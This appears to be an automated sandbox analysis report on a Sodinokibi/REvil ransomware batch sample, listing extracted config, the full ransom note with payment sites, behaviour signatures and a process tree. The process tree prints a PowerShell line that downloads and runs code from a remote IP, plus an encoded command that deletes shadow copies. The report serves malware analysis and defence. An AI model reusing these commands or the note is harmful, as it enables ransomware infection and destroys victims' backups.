Analysis

  • max time kernel
    148s
  • resource
    win7v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    wKmecP8k.bat

  • Sample

    191216-t3y4krh43n

  • SHA256

    a2d1bfcdf15107fc32cacf9b39a4eb453610f20fc79328e3428c1551cf03e356

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/wKmecP8k

Extracted

Language
ps1
Source

Extracted

Path

C:\o0371501r-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension o0371501r. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EC6570002F081545 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/EC6570002F081545 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: X++vTsZZ5SfmX1BKxZ5AMUlnfCvA6AuSfbHI07L7VA2DfW0omuBF2MLAjT/rQomj Qa6qCZoHTaQkXlLzuJcXoubejwGPHl9gKuMObZg4GRVRNo4VdRsQ3oHK7GviIL/K l/bJziz/ntyvcNSzsMh0Qps7WmaBkFb5DPdPjc2OKvxU1jDDxltFmI5Oxe/vISqO GoN37FTbJqXRU+NLNlPn5rhBqdu/oKFRgZssy8sU5fZKM0Vw2xcQ/OZAwyhPUgSz 4J+sK9OUNpBDMSD74ZaLvmLVoenSVU0KF5Zj8MMSljP1maUbgCu7/+K9yf0AZjYj oWh9V2YZiadQ5IvsuGoEuyVDM57nXLa8c6OFYpTrHmPHqwQxM7sKiteUSFRzz95O xLWAAG9W8PrA7VSwZQbZxlsvewwwOaB4TqVDJ5VIJ1mwRSCq4IqT5sYpWWGqXlnW QyYNjWhyH8DF8QdMdlWtUenZqdOFYUIzvJwVzDsyAEhuzY4YyRUFeJb3tGgcsVUP TLSgISrh7QH/djTb+qTdiwYL2Mu76yTW0jll82Zvs8rblxRbPtczMpE9eWBTcdJe 8N5BckxMeoqwgEzrRb18tSmtnywPiDyRYqmn+UbQWV3SUK3RSdE7EcGOplqw8g3t 0N4FpGo4cr6PaST7kicgGQhhZ4ECBg18hTeiWOdw+xzOQNvlCcnnUHK7P4NfG/tM usW2gzuwGK4NyibMO0ygPxBHiBxmp7cFxF70YPPpWBmllzrWzbBDJigHxvKsVZpT j5po74WRjj1nZ6EsOa9stlqAu6YddhhzA/+87uP3+JvPo8+XOEd35S3PSK7+pQSX IDPxRSdtkDv9O6cPQ7rfCI5v0jci2dIaQzEOhIE1v+ogXGFm0IwJdVYYS+p3Wyi0 iROoJTs88ZSYln36O/Hm/ge2PD9m2HNq8rAWpQLMZRnKMFgaCLtD2s7kIo6yjfwm 5tz0BguJP64naa8SUOh0JNDjt/dKSF1rO2zcrwyD+zey894uNA7Trn26fPNtdBIv 50jfdcdiXyfEYKJB3+O63r2R6tWCT3gpuWXG635qC7uIK9Y0VfOowCSiHtzMVqap YwtwaWJF8ZJm1yHnU5ubukkxPStTwD52UQocvELGdyZM4/6oDsgRY/+TnJEAXxvQ BR9Uf8LV5xNr/PIKLJ4bEog6 Extension name: o0371501r -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EC6570002F081545

http://decryptor.top/EC6570002F081545

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Drops file in Program Files directory 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Adds Run entry to start application 2 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\wKmecP8k.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/wKmecP8k');Invoke-KSPUREEKGNMIALY;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Discovering connected drives
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      PID:1048
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        • Suspicious behavior: EnumeratesProcesses
        PID:856
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-11829547421812937322-18238739831590957330898537487-424150329-1259984517-303643781"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1100
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1153012532-17751320222774113601082764279-529990295755984812-1260573584319538335"
    1⤵
      PID:1332
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:456

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms